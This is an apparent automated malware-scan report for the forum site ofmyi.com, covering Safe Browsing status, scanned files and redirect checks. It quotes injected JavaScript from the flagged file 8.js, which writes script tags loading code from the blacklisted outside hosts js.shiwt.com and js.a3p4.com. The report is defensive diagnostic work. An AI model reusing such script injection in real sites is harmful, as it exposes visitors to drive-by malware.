Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ofmyi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ofmyi.com/ | 200 OK Content-Length: 15651 Content-Type: text/html | clean |
http://ofmyi.com/forumdata/cache/common.js?CZS | 200 OK Content-Length: 58892 Content-Type: application/x-javascript | clean |
http://ofmyi.com/top4.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://ofmyi.com/include/js/slide.js | 200 OK Content-Length: 5276 Content-Type: application/x-javascript | clean |
http://ofmyi.com/top5.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://ofmyi.com/8.js | 200 OK Content-Length: 1125 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: js.shiwt.com document.writeln("<script src=\"http:\/\/js.shiwt.com\/110.js\"><\/script>"); r = 2; var seed = Math.random(); rnd = Math.ceil(seed * r); switch (rnd) { case 1: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); break; case 2: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); default: ...[814 bytes skipped]... | ||
http://ofmyi.com/index.php | 200 OK Content-Length: 15651 Content-Type: text/html | clean |
http://ofmyi.com/register3.php | 200 OK Content-Length: 8726 Content-Type: text/html | clean |
http://ofmyi.com/logging.php?action=login | 200 OK Content-Length: 9462 Content-Type: text/html | clean |
http://ofmyi.com/forumdata/cache/md5.js?CZS | 200 OK Content-Length: 4730 Content-Type: application/x-javascript | clean |
http://ofmyi.com/search.php | 200 OK Content-Length: 9232 Content-Type: text/html | clean |
http://ofmyi.com/faq.php | 200 OK Content-Length: 9257 Content-Type: text/html | clean |
http://ofmyi.com/misc.php?action=nav | 200 OK Content-Length: 7784 Content-Type: text/html | clean |
http://ofmyi.com/pm.php?filter=newpm | 200 OK Content-Length: 6635 Content-Type: text/html | clean |
http://ofmyi.com/pm.php?filter=announcepm | 200 OK Content-Length: 6635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ofmyi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 17:27:33 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 2HU_lastrequest=213328yLMqJ5K3qfc8UoW0WB%2FdMcgs22hKnZzS3zXd7wmB6TXpwA; path=/; httponly
Set-Cookie: 2HU_sid=3O37s0; expires=Wed, 28-Jan-2015 17:27:33 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
GET / HTTP/1.1
Host: ofmyi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 17:27:33 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 2HU_lastrequest=213328yLMqJ5K3qfc8UoW0WB%2FdMcgs22hKnZzS3zXd7wmB6TXpwA; path=/; httponly
Set-Cookie: 2HU_sid=3O37s0; expires=Wed, 28-Jan-2015 17:27:33 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: ofmyi.com
Referer: http://www.google.com/search?q=ofmyi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ofmyi.com
Referer: http://www.google.com/search?q=ofmyi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.